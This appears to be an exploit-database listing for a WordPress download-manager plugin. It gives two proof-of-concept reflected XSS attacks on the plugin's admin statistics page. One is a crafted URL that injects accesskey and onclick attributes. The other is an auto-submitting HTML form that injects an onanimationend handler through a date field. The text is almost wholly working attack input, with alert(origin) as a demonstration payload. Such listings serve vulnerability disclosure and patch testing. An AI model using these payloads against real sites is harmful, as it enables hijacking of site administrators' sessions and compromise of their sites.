Share
## https://sploitus.com/exploit?id=WPEX-ID:EF9AE513-6C29-45C2-B5AE-4A06A217C499
PoC 1: This requires Firefox due to onclick+accesskey trick on hidden input. There is another injection point, but magic quotes are doing its job (it's inside badly-enqueued inline JS)

1) Go to https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList%22+accesskey%3DA+onclick%3Dalert%28origin%29%2F%2F
2) Press Alt-Shift-A (Windows) or Cmd-Alt-A (macOS)

PoC 2: This does not have browser requirement.
<form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList" method="post" id="xss">
<input type="hidden" name="sdm_stats_start_date" value="&quot; style=animation-name:rotation onanimationend=alert(origin)//">
</form>
<script>xss.submit()</script>